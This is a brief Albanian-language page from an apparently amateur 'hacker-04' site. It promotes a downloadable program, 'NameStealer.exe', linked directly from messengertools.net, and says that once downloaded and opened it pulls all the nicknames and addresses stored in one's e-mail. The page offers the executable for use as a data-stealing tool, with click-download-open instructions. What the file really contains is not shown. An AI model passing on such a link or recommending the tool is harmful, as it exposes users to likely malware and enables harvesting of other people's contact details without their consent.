hacker-04
  Kthehu
 
Program shum i leht veq klikon në link e shkarkon del ne Desktop dhe hape ti qet të gjitha nikname e adresave që i ke në E-mail.

http://www.messengertools.net/Files/NameStealer.exe
 
 
  Today, there have been 72 visitors (226 hits) on this page! hacker-04  
 
=> Do you also want a homepage for free? Then click here! <=
hacker-04